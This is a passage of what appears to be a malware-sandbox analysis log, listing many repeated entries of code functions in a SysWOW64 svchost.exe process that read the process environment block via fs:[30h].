            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]2_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]2_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035666B0 mov eax, dword ptr fs:[00000030h]2_2_035666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C6A6 mov eax, dword ptr fs:[00000030h]2_2_0356C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]2_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]2_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6500 mov eax, dword ptr fs:[00000030h]2_2_035C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035365D0 mov eax, dword ptr fs:[00000030h]2_2_035365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]2_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]2_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]2_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]2_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035325E0 mov eax, dword ptr fs:[00000030h]2_2_035325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]2_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]2_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E59C mov eax, dword ptr fs:[00000030h]2_2_0356E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532582 mov eax, dword ptr fs:[00000030h]2_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532582 mov ecx, dword ptr fs:[00000030h]2_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564588 mov eax, dword ptr fs:[00000030h]2_2_03564588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]2_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]2_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352645D mov eax, dword ptr fs:[00000030h]2_2_0352645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355245A mov eax, dword ptr fs:[00000030h]2_2_0355245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC460 mov ecx, dword ptr fs:[00000030h]2_2_035BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A430 mov eax, dword ptr fs:[00000030h]2_2_0356A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C427 mov eax, dword ptr fs:[00000030h]2_2_0352C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035304E5 mov ecx, dword ptr fs:[00000030h]2_2_035304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035644B0 mov ecx, dword ptr fs:[00000030h]2_2_035644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BA4B0 mov eax, dword ptr fs:[00000030h]2_2_035BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035364AB mov eax, dword ptr fs:[00000030h]2_2_035364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]2_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]2_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FAB40 mov eax, dword ptr fs:[00000030h]2_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D8B42 mov eax, dword ptr fs:[00000030h]2_2_035D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CB7E mov eax, dword ptr fs:[00000030h]2_2_0352CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]2_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]2_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]2_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]2_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DEBD0 mov eax, dword ptr fs:[00000030h]2_2_035DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EBFC mov eax, dword ptr fs:[00000030h]2_2_0355EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BCBF0 mov eax, dword ptr fs:[00000030h]2_2_035BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]2_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]2_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]2_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]2_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]2_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]2_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BCA11 mov eax, dword ptr fs:[00000030h]2_2_035BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]2_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]2_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA38 mov eax, dword ptr fs:[00000030h]2_2_0356CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA24 mov eax, dword ptr fs:[00000030h]2_2_0356CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EA2E mov eax, dword ptr fs:[00000030h]2_2_0355EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530AD0 mov eax, dword ptr fs:[00000030h]2_2_03530AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]2_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]2_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]2_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]2_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568A90 mov edx, dword ptr fs:[00000030h]2_2_03568A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604A80 mov eax, dword ptr fs:[00000030h]2_2_03604A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]2_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]2_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586AA4 mov eax, dword ptr fs:[00000030h]2_2_03586AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0946 mov eax, dword ptr fs:[00000030h]2_2_035B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]2_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]2_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC97C mov eax, dword ptr fs:[00000030h]2_2_035BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov edx, dword ptr fs:[00000030h]2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC912 mov eax, dword ptr fs:[00000030h]2_2_035BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]2_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]2_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]2_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]2_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B892A mov eax, dword ptr fs:[00000030h]2_2_035B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C892B mov eax, dword ptr fs:[00000030h]2_2_035C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035649D0 mov eax, dword ptr fs:[00000030h]2_2_035649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA9D3 mov eax, dword ptr fs:[00000030h]2_2_035FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C69C0 mov eax, dword ptr fs:[00000030h]2_2_035C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE9E0 mov eax, dword ptr fs:[00000030h]2_2_035BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov esi, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]2_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]2_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560854 mov eax, dword ptr fs:[00000030h]2_2_03560854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]2_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]2_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03542840 mov ecx, dword ptr fs:[00000030h]2_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]2_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]2_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]2_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]2_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC810 mov eax, dword ptr fs:[00000030h]2_2_035BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov ecx, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A830 mov eax, dword ptr fs:[00000030h]2_2_0356A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D483A mov eax, dword ptr fs:[00000030h]2_2_035D483A
